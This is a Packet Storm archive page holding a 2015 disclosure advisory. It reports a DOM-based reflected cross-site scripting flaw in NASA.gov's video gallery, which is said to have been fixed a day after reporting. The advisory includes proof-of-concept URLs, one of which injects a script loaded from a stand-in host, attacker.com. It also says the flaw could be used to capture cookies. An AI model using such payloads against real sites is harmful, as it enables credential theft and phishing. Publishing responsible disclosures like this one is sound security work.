what you don't know can hurt you

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting
Posted Apr 1, 2015
Authored by Yann CAM

NASA.gov suffered from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 3f01be8803358f55b95e204b9006f9ad

NASA.gov Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================

The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)


Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in nasa.gov main-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies.
These reflected XSS are on GET variables and are not properly sanitized before being used in page.


NASA’s main portal - video gallery - PoC :
=======================================================================================

- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />


Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png


Solution:
=======================================================================================

Fixed by NASA Portal's team.


Additional resources :
=======================================================================================

- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com


Report timeline :
=======================================================================================

2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    7 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close